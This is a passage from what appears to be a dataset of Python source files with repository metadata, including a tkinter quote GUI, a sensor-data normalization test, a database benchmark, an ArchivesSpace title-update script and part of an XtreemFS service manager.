:param Callable|str target: a native object or a path to an external file, which contains
the structure to be tested
:param str target_name: if target is a path, this indicates the name of the structure to
test
:param str env: environment of the target, usually just the language name itself
"""
executor_id = (target, target_name)
if executor_id not in self._executors_pool:
# Find the corresponding executor
if isstring(target):
cls = ExternalExecutorFabric.get(env) or ExternalExecutorFabric.guess(target)
executor = cls(target, target_name)
elif callable(target):
executor = (ClassExecutor if isclass(target) else FunctionExecutor)(target)
else:
raise TypeError('Target is not a callable nor str')
self._executors_pool[executor_id] = executor
super(Target, self).__init__(self._executors_pool[executor_id])
@classmethod
def close(cls):
for executor_id, e in list(cls._executors_pool.items()):
target, _ = executor_id
logger.debug('Executor %s on %s closed', e.ENVIRONMENT, target)
e.close()
del cls._executors_pool[executor_id]
def _close_executors():
Target.close()
atexit.register(_close_executors)
del _close_executors
| 0
| 259
| 0
| 1,256
| 0
| 21
| 0
| 89
| 224
|
5855a718f19fd271a7d90653c654f8cb39f399af
| 83
|
py
|
Python
|
src/polls/forLoop5.py
|
Prince-linux/python-learning
|
75335ed497081b557400a05320b52b8889c3e1f4
|
[
"MIT"
] | 1
|
2015-08-27T13:03:27.000Z
|
2015-08-27T13:03:27.000Z
|
src/polls/forLoop5.py
|
Prince-linux/python-learning
|
75335ed497081b557400a05320b52b8889c3e1f4
|
[
"MIT"
] | 22
|
2015-08-23T18:17:30.000Z
|
2015-09-16T13:38:36.000Z
|
src/polls/forLoop5.py
|
Prince-linux/python-learning
|
75335ed497081b557400a05320b52b8889c3e1f4
|
[
"MIT"
] | null | null | null |
for i in range(201, 0, -2):
print(i)
for i in range(100, 0, -1):
print(i)
| 13.833333
| 27
| 0.53012
|
for i in range(201, 0, -2):
print(i)
for i in range(100, 0, -1):
print(i)
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
ca4f6f3248cffb86968c72e3aaf6cc6ec45f47c6
| 430
|
py
|
Python
|
Vars & Data Entry/exercicio 3.py
|
SkaarlK/Learning-Python
|
bbf011182fb5bf876aa9a274400c41a266a0e8c7
|
[
"MIT"
] | 2
|
2022-01-01T19:31:56.000Z
|
2022-01-01T19:32:54.000Z
|
Vars & Data Entry/exercicio 3.py
|
SkaarlK/Learning-Python
|
bbf011182fb5bf876aa9a274400c41a266a0e8c7
|
[
"MIT"
] | null | null | null |
Vars & Data Entry/exercicio 3.py
|
SkaarlK/Learning-Python
|
bbf011182fb5bf876aa9a274400c41a266a0e8c7
|
[
"MIT"
] | null | null | null |
dias = int(input("Insira os dias para virarem segundos: "))
horas = int(input("Insira as horas para virarem segundos: "))
minutos = int(input("Insira os minutos para virarem segundos: "))
segundos = int(input("Insira os segundos para serem somados aos anteriores: "))
segundos += (dias * 86400) + (horas * 3600) + (minutos * 60)
print("Total de dias, horas, minutos e segundos informados foram de: " + str(segundos) + " segundos")
| 71.666667
| 101
| 0.711628
|
dias = int(input("Insira os dias para virarem segundos: "))
horas = int(input("Insira as horas para virarem segundos: "))
minutos = int(input("Insira os minutos para virarem segundos: "))
segundos = int(input("Insira os segundos para serem somados aos anteriores: "))
segundos += (dias * 86400) + (horas * 3600) + (minutos * 60)
print("Total de dias, horas, minutos e segundos informados foram de: " + str(segundos) + " segundos")
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
c06c9c6d5402fedf403bcb579088899fc6cd9baf
| 748
|
py
|
Python
|
motivate_gui.py
|
neesara/motivate
|
36cfb2a3502d48b99189841f35b9693e40dd8532
|
[
"MIT"
] | null | null | null |
motivate_gui.py
|
neesara/motivate
|
36cfb2a3502d48b99189841f35b9693e40dd8532
|
[
"MIT"
] | null | null | null |
motivate_gui.py
|
neesara/motivate
|
36cfb2a3502d48b99189841f35b9693e40dd8532
|
[
"MIT"
] | null | null | null |
import tkinter as tk
import os
import random
import datetime
root = tk.Tk()
root.title("Motivation")
root.configure(background='white')
command=os.getcwd()+'/motivate/motivate.py'
quote=os.popen(command).read()
color=random.choice(['green','blue','purple','red','orange','brown','magenta','violet','maroon','olive','lime','teal','navy','DarkSlateGray','m','indigo','crimson'])
label=tk.Label(root, text = quote ,fg=color, bg='white', font='Helvetica 10',wraplength=900).pack()
if datetime.datetime.today().weekday() == 4 :
label=tk.Label(root, text = "Timesheet!!" ,fg='red', bg='white', font='Helvetica 20',wraplength=900,pady=10).pack()
quit_btn=tk.Button(root,text="Quit",command=root.destroy)
quit_btn.pack(side="bottom")
root.mainloop()
| 39.368421
| 165
| 0.71123
|
import tkinter as tk
import os
import random
import datetime
root = tk.Tk()
root.title("Motivation")
root.configure(background='white')
command=os.getcwd()+'/motivate/motivate.py'
quote=os.popen(command).read()
color=random.choice(['green','blue','purple','red','orange','brown','magenta','violet','maroon','olive','lime','teal','navy','DarkSlateGray','m','indigo','crimson'])
label=tk.Label(root, text = quote ,fg=color, bg='white', font='Helvetica 10',wraplength=900).pack()
if datetime.datetime.today().weekday() == 4 :
label=tk.Label(root, text = "Timesheet!!" ,fg='red', bg='white', font='Helvetica 20',wraplength=900,pady=10).pack()
quit_btn=tk.Button(root,text="Quit",command=root.destroy)
quit_btn.pack(side="bottom")
root.mainloop()
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
57bdb73e1704842d0766817fd5391f99486fe936
| 2,062
|
py
|
Python
|
tests/test_normalization.py
|
learniotai/iotai-sensor-classifications
|
ba2527cb317afa30a5c495d1cddc16f7dc2936ed
|
[
"Apache-2.0"
] | null | null | null |
tests/test_normalization.py
|
learniotai/iotai-sensor-classifications
|
ba2527cb317afa30a5c495d1cddc16f7dc2936ed
|
[
"Apache-2.0"
] | null | null | null |
tests/test_normalization.py
|
learniotai/iotai-sensor-classifications
|
ba2527cb317afa30a5c495d1cddc16f7dc2936ed
|
[
"Apache-2.0"
] | null | null | null |
"""Test normalizing gesture recording data."""
SAMPLES_PER_RECORDING = 160
| 54.263158
| 113
| 0.727934
|
"""Test normalizing gesture recording data."""
import os
import numpy as np
from iotai_sensor_classification.recording import read_recordings
from iotai_sensor_classification.normalization import normalize_mean_std_dict
from data.gestures import linear_accelerometer
from iotai_sensor_classification.plot_util import column_histograms, plot_columns, \
plot_lines, histogram_overlay
SAMPLES_PER_RECORDING = 160
def test_normalize_gesture_data():
recordings_dir = os.path.dirname(linear_accelerometer.__file__)
raw_gestures = read_recordings(recordings_dir=recordings_dir)
normalized_gestures = normalize_mean_std_dict(raw_gestures)
test_output = os.path.join("test_output", "gestures", "normalized")
os.makedirs(test_output, exist_ok=True)
for gesture in normalized_gestures.keys():
normalized = normalized_gestures[gesture]
column_histograms(normalized, name=f"{gesture} gesture normalized",
filepath=os.path.join(test_output, f"{gesture}-norm-histograms.png"))
plot_columns(normalized, name=f"{gesture} gesture normalized",
filepath=os.path.join(test_output, f"{gesture}-norm-plots.png"))
motion_measures = normalized.drop(columns=['time', 'label'])
plot_lines(motion_measures, name=f"{gesture} normalized measurements",
filepath=os.path.join(test_output, f"{gesture}-norm-lines.png"))
plot_lines(motion_measures, name=f"{gesture} normalized window={SAMPLES_PER_RECORDING}",
filepath=os.path.join(test_output, f"{gesture}-norm-lines-window{SAMPLES_PER_RECORDING}.png"),
vertical_tick_spacing=SAMPLES_PER_RECORDING)
histogram_overlay(motion_measures, name=f"{gesture} normalized measurements",
filepath=os.path.join(test_output, f"{gesture}-norm-over-hist.png"))
# https://numpy.org/doc/stable/reference/generated/numpy.allclose.html
assert np.allclose(normalized.mean(), 0.0)
assert np.allclose(normalized.std(), 1.0)
| 0
| 0
| 0
| 0
| 0
| 1,621
| 0
| 207
| 156
|
fb9c84f69582b895624fd919a820ac62d428a59c
| 4,791
|
py
|
Python
|
examples/book_view/benchmark.py
|
toluaina/essync
|
4a0119d99760eaa193f4ae60abd2b5f38482b280
|
[
"BSD-3-Clause"
] | 1
|
2019-09-26T21:05:37.000Z
|
2019-09-26T21:05:37.000Z
|
examples/book_view/benchmark.py
|
toluaina/essync
|
4a0119d99760eaa193f4ae60abd2b5f38482b280
|
[
"BSD-3-Clause"
] | null | null | null |
examples/book_view/benchmark.py
|
toluaina/essync
|
4a0119d99760eaa193f4ae60abd2b5f38482b280
|
[
"BSD-3-Clause"
] | 1
|
2019-08-27T16:19:09.000Z
|
2019-08-27T16:19:09.000Z
|
FIELDS = {
"isbn": "isbn13",
"title": "sentence",
"description": "text",
"copyright": "word",
}
if __name__ == "__main__":
main()
| 29.757764
| 77
| 0.529743
|
import json
from random import choice
from typing import Set
import click
import sqlalchemy as sa
from faker import Faker
from schema import Book
from sqlalchemy.orm import sessionmaker
from pgsync.base import pg_engine
from pgsync.constants import DELETE, INSERT, TG_OP, TRUNCATE, UPDATE
from pgsync.utils import get_config, show_settings, Timer
FIELDS = {
"isbn": "isbn13",
"title": "sentence",
"description": "text",
"copyright": "word",
}
def insert_op(session: sessionmaker, model, nsize: int) -> None:
faker: Faker = Faker()
rows: Set = set([])
for _ in range(nsize):
kwargs = {}
for column in model.__table__.columns:
if column.foreign_keys:
foreign_key = list(column.foreign_keys)[0]
pk = [
column.name
for column in foreign_key.column.table.columns
if column.primary_key
][0]
fkey = (
session.query(foreign_key.column.table)
.order_by(sa.func.random())
.limit(1)
)
value = getattr(fkey[0], pk)
kwargs[column.name] = value
elif column.primary_key:
continue
else:
field = FIELDS.get(column.name)
if not field:
# continue
raise RuntimeError(f"field {column.name} not in mapping")
value = getattr(faker, field)()
kwargs[column.name] = value
print(f"Inserting {model.__table__} VALUES {kwargs}")
row = model(**kwargs)
rows.add(row)
with Timer(f"Created {nsize} {model.__table__} in"):
try:
session.add_all(rows)
session.commit()
except Exception as e:
print(f"Exception {e}")
session.rollback()
def update_op(session: sessionmaker, model, nsize: int) -> None:
column: str = choice(list(FIELDS.keys()))
if column not in [column.name for column in model.__table__.columns]:
raise RuntimeError()
faker: Faker = Faker()
with Timer(f"Updated {nsize} {model.__table__}"):
for _ in range(nsize):
field = FIELDS.get(column)
value = getattr(faker, field)()
row = (
session.query(model)
.filter(getattr(model, column) != value)
.order_by(sa.func.random())
.limit(1)
)
if row:
print(f'Updating {model.__table__} SET {column} = "{value}"')
try:
setattr(row[0], column, value)
session.commit()
except Exception as e:
session.rollback()
def delete_op(session: sessionmaker, model, nsize: int) -> None:
with Timer(f"Deleted {nsize} {model.__table__}"):
for _ in range(nsize):
row = session.query(model).order_by(sa.func.random()).limit(1)
pk = [
column.name
for column in filter(
lambda x: x.primary_key, model.__table__.columns
)
][0]
if row:
try:
value = getattr(row[0], pk)
print(f"Deleting {model.__table__} WHERE {pk} = {value}")
session.query(model).filter(
getattr(model, pk) == value
).delete()
session.commit()
except Exception as e:
session.rollback()
@click.command()
@click.option(
"--config",
"-c",
help="Schema config",
type=click.Path(exists=True),
)
@click.option("--daemon", "-d", is_flag=True, help="Run as a daemon")
@click.option("--nsize", "-n", default=5000, help="Number of samples")
@click.option(
"--tg_op",
"-t",
help="TG_OP",
type=click.Choice(
TG_OP,
case_sensitive=False,
),
)
def main(config, nsize, daemon, tg_op):
show_settings()
config: str = get_config(config)
documents: dict = json.load(open(config))
engine = pg_engine(
database=documents[0].get("database", documents[0]["index"])
)
Session = sessionmaker(bind=engine, autoflush=False, autocommit=False)
session = Session()
model = Book
func = {
INSERT: insert_op,
UPDATE: update_op,
DELETE: delete_op,
}
# lets do only the book model for now
while True:
if tg_op:
func[tg_op](session, model, nsize)
else:
func[choice(TG_OP)](session, model, nsize)
if not daemon:
break
if __name__ == "__main__":
main()
| 0
| 1,070
| 0
| 0
| 0
| 3,123
| 0
| 105
| 336
|
b388ad646acdaff30e3ae11dca9c423ac5dc3c80
| 794
|
py
|
Python
|
resources/ArchivesSpace post-migration scripts/TitleCapitalization.py
|
smith-special-collections/aspace-migration
|
0ad6f1346df52e12739f27b54570586af4362559
|
[
"MIT"
] | 2
|
2016-09-14T12:31:40.000Z
|
2018-05-25T02:45:37.000Z
|
resources/ArchivesSpace post-migration scripts/TitleCapitalization.py
|
smith-special-collections/aspace-migration
|
0ad6f1346df52e12739f27b54570586af4362559
|
[
"MIT"
] | 1
|
2017-04-13T16:24:59.000Z
|
2017-04-18T19:30:08.000Z
|
resources/ArchivesSpace post-migration scripts/TitleCapitalization.py
|
smith-special-collections/aspace-migration
|
0ad6f1346df52e12739f27b54570586af4362559
|
[
"MIT"
] | null | null | null |
import requests
import json
aspace_url = 'http://localhost:8089'
username = 'admin'
password = 'admin'
repo_num = '2'
auth = requests.post(aspace_url+'/users/'+username+'/login?password='+password).json()
session = auth["session"]
headers = {'X-ArchivesSpace-Session':session}
for d in range(1,6):
resource_json = requests.get(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers).json()
resource_title = resource_json['title']
print 'Current title is: ' +resource_title
if 'Papers' in resource_title:
resource_json["title"] = resource_json['title'].replace(" Papers"," papers")
updated = requests.post(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers, data=json.dumps(resource_json))
print 'New title is: ' + resource_json["title"]
| 37.809524
| 133
| 0.730479
|
import requests
import json
aspace_url = 'http://localhost:8089'
username = 'admin'
password = 'admin'
repo_num = '2'
auth = requests.post(aspace_url+'/users/'+username+'/login?password='+password).json()
session = auth["session"]
headers = {'X-ArchivesSpace-Session':session}
for d in range(1,6):
resource_json = requests.get(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers).json()
resource_title = resource_json['title']
print 'Current title is: ' +resource_title
if 'Papers' in resource_title:
resource_json["title"] = resource_json['title'].replace(" Papers"," papers")
updated = requests.post(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers, data=json.dumps(resource_json))
print 'New title is: ' + resource_json["title"]
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
2abcfcc2281955e4ae7cbe49ec5370d4ae3c495c
| 540
|
py
|
Python
|
Node.py
|
akshaykamath/Bayes-Network-Inference-Algorithms
|
3a0867130dd74bf2444a7ce4f972fff6b1a989dc
|
[
"MIT"
] | null | null | null |
Node.py
|
akshaykamath/Bayes-Network-Inference-Algorithms
|
3a0867130dd74bf2444a7ce4f972fff6b1a989dc
|
[
"MIT"
] | null | null | null |
Node.py
|
akshaykamath/Bayes-Network-Inference-Algorithms
|
3a0867130dd74bf2444a7ce4f972fff6b1a989dc
|
[
"MIT"
] | null | null | null |
__author__ = 'Akshay'
| 21.6
| 48
| 0.625926
|
__author__ = 'Akshay'
class Node:
initial_time = 0
finish_time = 0
name = None
child_nodes = None
parent_nodes = None
conditional_probability_table = {}
def __init__(self, nm):
self.name = nm
self.parent_distance = 0
self.child_nodes = []
self.parent_nodes = []
def add_child(self, node=None, weight=None):
self.child_nodes.append((node, weight))
node.parent_nodes.append(self)
def has_child(self, node=None):
return node in self.child_nodes
| 0
| 0
| 0
| 493
| 0
| 0
| 0
| 0
| 23
|
90d1a8e84d85bc7f4e6d8664cd0c5d4332376007
| 38,126
|
py
|
Python
|
conpaas-services/src/conpaas/services/xtreemfs/manager/manager.py
|
bopopescu/conpaas
|
e0a2955ae3e7da7525d799bed411e9f76ecf0919
|
[
"BSD-3-Clause"
] | 1
|
2015-09-20T18:20:01.000Z
|
2015-09-20T18:20:01.000Z
|
conpaas-services/src/conpaas/services/xtreemfs/manager/manager.py
|
bopopescu/conpaas
|
e0a2955ae3e7da7525d799bed411e9f76ecf0919
|
[
"BSD-3-Clause"
] | 1
|
2020-07-27T11:56:18.000Z
|
2020-07-27T11:56:18.000Z
|
conpaas-services/src/conpaas/services/xtreemfs/manager/manager.py
|
bopopescu/conpaas
|
e0a2955ae3e7da7525d799bed411e9f76ecf0919
|
[
"BSD-3-Clause"
] | 3
|
2018-09-14T16:54:14.000Z
|
2020-07-26T03:14:56.000Z
|
# -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
| 38.864424
| 138
| 0.577087
|
# -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.manager import ManagerException
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.services.xtreemfs.agent import client
import uuid
import base64
import subprocess
def invalid_arg(msg):
return HttpErrorResponse(ManagerException(
ManagerException.E_ARGS_INVALID, detail=msg).message)
class XtreemFSManager(BaseManager):
def __init__(self, config_parser, **kwargs):
BaseManager.__init__(self, config_parser)
# node lists
self.nodes = [] # all nodes
self.osdNodes = [] # only the OSD nodes
self.mrcNodes = [] # onle the MRC nodes
self.dirNodes = [] # only the DIR nodes
# node counters
self.dirCount = 0
self.mrcCount = 0
self.osdCount = 0
# wether we want to keep storage volumes upon OSD nodes deletion
self.persistent = False
# default value for OSD volume size
self.osd_volume_size = 1024
# dictionaries mapping node IDs to uuids
self.dir_node_uuid_map = {}
self.mrc_node_uuid_map = {}
self.osd_node_uuid_map = {}
# dictionary mapping osd uuids to volume IDs
self.osd_uuid_volume_map = {}
# Setup the clouds' controller
self.controller.generate_context('xtreemfs')
def __get__uuid(self, node_id, node_type):
if node_type == 'dir':
node_map = self.dir_node_uuid_map
elif node_type == 'mrc':
node_map = self.mrc_node_uuid_map
elif node_type == 'osd':
node_map = self.osd_node_uuid_map
else:
raise Exception("Unknown node type: %s" % node_type)
node_uuid = node_map.get(node_id)
if node_uuid:
self.logger.debug("%s already has a uuid (%s) -> %s" % (node_id,
node_type, node_uuid))
else:
node_uuid = str(uuid.uuid1())
node_map[node_id] = node_uuid
self.logger.debug("New uuid for %s (%s) -> %s" % (node_id,
node_type, node_uuid))
return node_uuid
def _start_dir(self, nodes):
self.logger.debug("_start_dir(%s)" % nodes)
for node in nodes:
try:
dir_uuid = self.__get__uuid(node.id, 'dir')
client.createDIR(node.ip, 5555, dir_uuid)
except client.AgentException:
self.logger.exception('Failed to start DIR at node %s' % node)
self.state = self.S_ERROR
raise
def _stop_dir(self, nodes, remove):
for node in nodes:
try:
client.stopDIR(node.ip, 5555)
except client.AgentException:
self.logger.exception('Failed to stop DIR at node %s' % node)
self.state = self.S_ERROR
raise
if remove:
del self.dir_node_uuid_map[node.id]
def _start_mrc(self, nodes):
for node in nodes:
try:
mrc_uuid = self.__get__uuid(node.id, 'mrc')
client.createMRC(node.ip, 5555, self.dirNodes[0].ip, mrc_uuid)
except client.AgentException:
self.logger.exception('Failed to start MRC at node %s' % node)
self.state = self.S_ERROR
raise
def _stop_mrc(self, nodes, remove):
for node in nodes:
try:
client.stopMRC(node.ip, 5555)
except client.AgentException:
self.logger.exception('Failed to stop MRC at node %s' % node)
self.state = self.S_ERROR
raise
if remove:
del self.mrc_node_uuid_map[node.id]
def _start_osd(self, nodes, cloud=None):
for idx, node in enumerate(nodes):
osd_uuid = self.__get__uuid(node.id, 'osd')
volume_associated = osd_uuid in self.osd_uuid_volume_map
# We need a storage volume for each OSD node. Check if this OSD
# node needs a new volume to be created.
if volume_associated:
# No need to create a new volume.
volume = self.get_volume(self.osd_uuid_volume_map[osd_uuid])
self.logger.debug(
'%s already has an associated storage volume (%s)' %
(osd_uuid, volume.id))
else:
# We need to create a new volume.
volume_name = "osd-%s" % osd_uuid
volume = self.create_volume(self.osd_volume_size, volume_name,
node.id, cloud)
self.osd_uuid_volume_map[osd_uuid] = volume.id
try:
self.attach_volume(volume.id, node.id, "sdb")
except Exception, err:
self.logger.error("attach_volume: %s" % err)
try:
client.createOSD(node.ip, 5555, self.dirNodes[0].ip, osd_uuid,
mkfs=not volume_associated)
except client.AgentException:
self.logger.exception('Failed to start OSD at node %s' % node)
self.state = self.S_ERROR
raise
def _stop_osd(self, nodes, remove, drain):
"""Stop OSD service on the given nodes.
The volume is always detached.
If remove is True, the volume is destroyed and node and volume are
deleted from internal data structures.
If drain is True, data is moved to other OSDs."""
for node in nodes:
try:
client.stopOSD(node.ip, 5555, drain)
except client.AgentException:
self.logger.exception('Failed to stop OSD at node %s' % node)
self.state = self.S_ERROR
raise
volume_id = self.osd_uuid_volume_map[self.osd_node_uuid_map[node.id]]
self.detach_volume(volume_id)
# destroy volumes and delete entries from internal state
if remove:
self.destroy_volume(volume_id)
del self.osd_uuid_volume_map[self.osd_node_uuid_map[node.id]]
del self.osd_node_uuid_map[node.id]
else:
self.logger.debug('Not destroying volume %s' % volume_id)
def _do_startup(self, cloud, resuming=False):
"""Starts up the service. The first nodes will contain all services.
If 'resuming' is set to True, we do not start XtreemFS services now.
set_service_snapshot will do that.
"""
startCloud = self._init_cloud(cloud)
try:
# NOTE: The following service structure is enforce:
# - the first node contains a DIR, MRC and OSD,
# those services can not be removed
# - added DIR, MRC and OSD services will all run
# on exclusive nodes
# - all explicitly added services can be removed
# create 1 node
node_instances = self.controller.create_nodes(1,
client.check_agent_process, 5555, startCloud)
# use this node for DIR, MRC and OSD
self.nodes += node_instances
self.dirNodes += node_instances
self.mrcNodes += node_instances
self.osdNodes += node_instances
# start DIR, MRC, OSD
if not resuming:
self._start_dir(self.dirNodes)
self._start_mrc(self.mrcNodes)
self._start_osd(self.osdNodes, startCloud)
# at the startup the DIR node will have all the services
self.dirCount = 1
self.mrcCount = 1
self.osdCount = 1
self.logger.info('Created 1 node with DIR, MRC and OSD services')
except:
self.logger.exception('do_startup: Failed to request a new node')
self.state = self.S_STOPPED
return
self.logger.info('XtreemFS service was started up')
self.state = self.S_RUNNING
@expose('POST')
def shutdown(self, kwargs):
self.state = self.S_EPILOGUE
# start _do_shutdown(stop_services=True) in a thread
Thread(target=self._do_shutdown, args=[True]).start()
return HttpJsonResponse()
def _start_all(self):
self._start_dir(self.dirNodes)
self._start_mrc(self.mrcNodes)
self._start_osd(self.osdNodes)
def _stop_all(self, remove=True):
"""Stop all xtreemfs services on all agents (first osd, then mrc, then
dir)."""
# do not drain (move data to other OSDs), since we stop all
self._stop_osd(self.osdNodes, remove=remove, drain=False)
self._stop_mrc(self.mrcNodes, remove=remove)
self._stop_dir(self.dirNodes, remove=remove)
def _do_shutdown(self, stop_services=False):
# check if we need to stop the services or not, i.e. when called at
# the end of get_snapshot()
if stop_services:
self._stop_all(remove=True)
self.controller.delete_nodes(self.nodes)
self.nodes = []
self.dirNodes = []
self.mrcNodes = []
self.osdNodes = []
self.dirCount = 0
self.mrcCount = 0
self.osdCount = 0
self.dir_node_uuid_map = {}
self.mrc_node_uuid_map = {}
self.osd_node_uuid_map = {}
self.osd_uuid_volume_map = {}
self.state = self.S_STOPPED
return HttpJsonResponse()
@expose('POST')
def add_nodes(self, kwargs):
#self.controller.add_context_replacement(dict(STRING='xtreemfs'))
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to add_nodes')
nr_dir = 0
nr_mrc = 0
nr_osd = 0
resuming = False;
if 'resuming' in kwargs:
resuming = kwargs['resuming']
# Adding DIR Nodes
if 'dir' in kwargs:
if not isinstance(kwargs['dir'], int):
return invalid_arg('Expected an integer value for "dir"')
nr_dir = int(kwargs.pop('dir'))
if nr_dir < 0:
return invalid_arg('Expected a positive integer value for "dir"')
# Adding MRC Nodes
if 'mrc' in kwargs:
if not isinstance(kwargs['mrc'], int):
return invalid_arg('Expected an integer value for "mrc"')
nr_mrc = int(kwargs.pop('mrc'))
if nr_mrc < 0:
return invalid_arg('Expected a positive integer value for "mrc"')
# TODO: 'osd' is no longer required, when adding other services is supported
if not 'osd' in kwargs:
return HttpErrorResponse('ERROR: Required argument doesn\'t exist')
if not isinstance(kwargs['osd'], int):
return HttpErrorResponse('ERROR: Expected an integer value for "osd"')
nr_osd = int(kwargs.pop('osd'))
if nr_osd < 0:
return invalid_arg('Expected a positive integer value for "nr osd"')
self.state = self.S_ADAPTING
Thread(target=self._do_add_nodes, args=[nr_dir, nr_mrc, nr_osd, kwargs['cloud'], resuming]).start()
return HttpJsonResponse()
# TODO: currently not used
def KillOsd(self, nodes):
for node in nodes:
client.stopOSD(node.ip, 5555)
self.osdNodes.remove(node)
def _do_add_nodes(self, nr_dir, nr_mrc, nr_osd, cloud, resuming=False):
startCloud = self._init_cloud(cloud)
totalNodes = nr_dir + nr_mrc + nr_osd
# try to create totalNodes new nodes
try:
node_instances = self.controller.create_nodes(totalNodes,
client.check_agent_process, 5555, startCloud)
except:
self.logger.exception('_do_add_nodes: Failed to request a new node')
self.state = self.S_STOPPED
return
self.nodes += node_instances
dirNodesAdded = node_instances[:nr_dir]
self.dirNodes += dirNodesAdded
mrcNodesAdded = node_instances[nr_dir:nr_mrc+nr_dir]
self.mrcNodes += mrcNodesAdded
osdNodesAdded = node_instances[nr_mrc+nr_dir:]
self.osdNodes += osdNodesAdded
# TODO: maybe re-enable when OSD-removal moves data to another node before shutting down the service.
#KilledOsdNodes = []
# The first node will contain the OSD service so it will be removed
# from there
#if nr_osd > 0 and self.osdCount == 0:
# KilledOsdNodes.append(self.dirNodes[0])
#self.KillOsd(KilledOsdNodes)
# Startup DIR agents
for node in dirNodesAdded:
client.startup(node.ip, 5555)
data = client.createDIR(node.ip, 5555)
self.logger.info('Received %s from %s', data, node.id)
self.dirCount += 1
# Startup MRC agents
for node in mrcNodesAdded:
client.startup(node.ip, 5555)
data = client.createMRC(node.ip, 5555, self.dirNodes[0].ip)
self.logger.info('Received %s from %s', data, node.id)
self.mrcCount += 1
# Startup OSD agents (if not resuming)
if not resuming:
self._start_osd(osdNodesAdded, startCloud)
self.osdCount += len(osdNodesAdded)
#for node in osdNodesAdded:
# client.startup(node.ip, 5555)
# data = client.createOSD(node.ip, 5555, self.dirNodes[0].ip)
# self.logger.info('Received %s from %s', data, node.id)
# self.osdCount += 1
self.state = self.S_RUNNING
return HttpJsonResponse()
@expose('GET')
def list_nodes(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpected')
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to list_nodes')
return HttpJsonResponse({
'dir': [node.id for node in self.dirNodes ],
'mrc': [node.id for node in self.mrcNodes],
'osd': [node.id for node in self.osdNodes]
})
@expose('GET')
def get_service_info(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpected')
return HttpJsonResponse({
'state': self.state,
'type': 'xtreemfs',
'persistent': self.persistent,
'osd_volume_size': self.osd_volume_size
})
@expose('GET')
def get_node_info(self, kwargs):
if 'serviceNodeId' not in kwargs:
return HttpErrorResponse('ERROR: Missing arguments')
serviceNodeId = kwargs.pop('serviceNodeId')
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpected')
serviceNode = None
for node in self.nodes:
if serviceNodeId == node.id:
serviceNode = node
break
if serviceNode is None:
return HttpErrorResponse('ERROR: Invalid arguments')
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip,
'dir': serviceNode in self.dirNodes,
'mrc': serviceNode in self.mrcNodes,
'osd': serviceNode in self.osdNodes
}
})
@expose('POST')
def remove_nodes(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to remove_nodes')
nr_dir = 0
nr_mrc = 0
nr_osd = 0
# Removing DIR Nodes
if 'dir' in kwargs:
if not isinstance(kwargs['dir'], int):
return invalid_arg('Expected an integer value for "dir"')
nr_dir = int(kwargs.pop('dir'))
if nr_dir < 0:
return invalid_arg('Expected a positive integer value for "dir"')
if nr_dir > self.dirCount - 1: # we need at least 1 DIR
return invalid_arg('Cannot remove_nodes that many DIR nodes')
# Removing MRC nodes
if 'mrc' in kwargs:
if not isinstance(kwargs['mrc'], int):
return invalid_arg('Expected an integer value for "mrc"')
nr_mrc = int(kwargs.pop('mrc'))
if nr_mrc < 0:
return invalid_arg('Expected a positive integer value for "mrc"')
if nr_mrc > self.mrcCount - 1: # we need at least 1 MRC
return invalid_arg('Cannot remove_nodes that many MRC nodes')
# TODO: 'osd' is no longer required, when removing other services is supported
if not 'osd' in kwargs:
return HttpErrorResponse('ERROR: Required argument doesn\'t exist')
if not isinstance(kwargs['osd'], int):
return HttpErrorResponse(
'ERROR: Expected an integer value for "osd"')
nr_osd = int(kwargs.pop('osd'))
if nr_osd < 0:
return invalid_arg('Expected a positive integer value for "osd"')
if nr_osd > self.osdCount - 1: # we need at least 1 OSD
return invalid_arg('Cannot remove_nodes that many OSD nodes')
self.state = self.S_ADAPTING
Thread(target=self._do_remove_nodes, args=[nr_dir, nr_mrc, nr_osd]).start()
return HttpJsonResponse()
def _do_remove_nodes(self, nr_dir, nr_mrc, nr_osd):
# NOTE: the logically unremovable first node which contains all
# services is ignored by using 1 instead of 0 in:
# for _ in range(0, nr_[dir|mrc|osd]):
# node = self.[dir|mrc|osd]Nodes.pop(1)
if nr_dir > 0:
for _ in range(0, nr_dir):
node = self.dirNodes.pop(1)
self._stop_dir([node], remove=True)
self.controller.delete_nodes([node])
self.nodes.remove(node)
self.dirCount -= nr_osd
if nr_mrc > 0:
for _ in range(0, nr_mrc):
node = self.mrcNodes.pop(1)
self._stop_mrc([node], remove=True)
self.controller.delete_nodes([node])
self.nodes.remove(node)
self.mrcCount -= nr_mrc
if nr_osd > 0:
for _ in range(0, nr_osd):
node = self.osdNodes.pop(1)
self._stop_osd([node], remove=True, drain=True)
self.controller.delete_nodes([node])
self.nodes.remove(node)
self.osdCount -= nr_osd
self.state = self.S_RUNNING
# TODO: maybe re-enable when OSD-removal moves data to another node before shutting down the service.
# if there are no more OSD nodes we need to start OSD service on the
# DIR node
#if self.osdCount == 0:
# self.osdNodes.append(self.dirNodes[0])
# self._start_osd(self.dirNodes)
return HttpJsonResponse()
@expose('POST')
def createMRC(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create MRC service')
# Just createMRC from all the agents
for node in self.nodes:
data = client.createMRC(node.ip, 5555, self.dirNodes[0].ip)
